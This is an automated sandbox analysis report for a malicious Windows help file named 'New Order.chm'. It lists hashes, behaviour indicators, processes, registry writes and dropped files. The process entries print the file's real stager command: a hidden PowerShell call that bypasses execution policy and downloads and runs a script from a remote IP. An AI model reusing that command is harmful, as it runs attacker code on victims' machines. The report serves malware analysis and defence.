File name:

New Order.chm

Full analysis: https://app.any.run/tasks/dcddb39a-e1f7-4160-844b-bfef6150aea0
Verdict: Malicious activity
Analysis date: August 24, 2023, 10:53:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

29969A12AFFA17F6F93DF78C2BB1382E

SHA1:

77CC16182D312205EC9F1D20560485057DD1881F

SHA256:

CAC7B23905699844A41F924C5F4BCA1C167C3E14150DB20EDAA5BC30E279EB8A

SSDEEP:

48:nEgi0oQRlEFlErlEleO5s0Cb41ZxhOC4HvLSTEJyrhPyd0KrbB9JvvqvG1+JwGGA:n8PpyuxhF4HjVuopHj+Jwx2D8/HQh

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 952)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 952)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1424)
  • SUSPICIOUS

    • Request a resource from the Internet using PowerShell's cmdlet

      • hh.exe (PID: 996)
      • cmd.exe (PID: 1424)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1424)
    • Reads Microsoft Outlook installation path

      • hh.exe (PID: 996)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1424)
    • Starts CMD.EXE for commands execution

      • hh.exe (PID: 996)
    • Reads the Internet Settings

      • hh.exe (PID: 996)
    • Reads Internet Explorer settings

      • hh.exe (PID: 996)
    • Powershell version downgrade attack

      • powershell.exe (PID: 952)
  • INFO

    • Reads the machine GUID from the registry

      • hh.exe (PID: 996)
      • wmpnscfg.exe (PID: 2304)
    • Checks proxy server information

      • hh.exe (PID: 996)
    • Create files in a temporary directory

      • hh.exe (PID: 996)
    • Checks supported languages

      • wmpnscfg.exe (PID: 2304)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 2304)
    • Reads the computer name

      • wmpnscfg.exe (PID: 2304)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chm | Windows HELP File (18.9)

EXIF

EXE

LanguageCode: English (U.S.)
CHMVersion: 3
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start hh.exe no specs cmd.exe no specs powershell.exe no specs wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
952powershell -w 1 -exec Bypass -c iex (iwr "http://88.209.206.142/13.txt" -UseBasicParsing).ContentC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
996"C:\Windows\hh.exe" "C:\Users\admin\AppData\Local\Temp\New Order.chm"C:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\hh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\hhctrl.ocx
c:\windows\system32\user32.dll
1424"C:\Windows\System32\cmd.exe" /c powershell -w 1 -exec Bypass -c iex (iwr "http://88.209.206.142/13.txt" -UseBasicParsing).ContentC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2304"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ole32.dll
Total events
1 772
Read events
1 705
Write events
64
Delete events
3

Modification events

(PID) Process:(996) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(996) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(996) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(996) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(996) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(996) hh.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(952) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\178\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2304) wmpnscfg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{F8F4C090-0D6F-4240-92D4-B5E5731D82E9}\{D800F237-F0E8-43E9-89AA-D14248ADCF6D}
Operation:delete keyName:(default)
Value:
(PID) Process:(2304) wmpnscfg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{F8F4C090-0D6F-4240-92D4-B5E5731D82E9}
Operation:delete keyName:(default)
Value:
(PID) Process:(2304) wmpnscfg.exeKey:HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health\{0E95EC8D-7936-4B9D-BB8D-BF5082F1BE1F}
Operation:delete keyName:(default)
Value:
Executable files
0
Suspicious files
7
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
996hh.exeC:\Users\admin\AppData\Local\Temp\~DFB78192E4BA71FE7B.TMPgmc
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
952powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf813d.TMPbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
996hh.exeC:\Users\admin\AppData\Local\Temp\~DF8E37E4261E5A1B33.TMPbinary
MD5:72F5C05B7EA8DD6059BF59F50B22DF33
SHA256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
952powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
952powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\65YKDAYEXADVXVM7WVPN.tempbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
996hh.exeC:\Users\admin\AppData\Local\Temp\IMTC85.tmpbinary
MD5:5D0E5693027A0E5ADF1D49847779B65C
SHA256:AC0710AABAAEAAC65507050647FA9D97A82639DA0D1D6B436800B177478C6D6B
996hh.exeC:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.datchm
MD5:F4229EC833FA53E66B21B502473153AE
SHA256:8E98F4F9F2050488CA6F00FD49F0357773DB107B9D4B1F7CC5A7579E164141DF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3284
svchost.exe
239.255.255.250:1900
whitelisted

DNS requests

No data

Threats

No threats detected
No debug info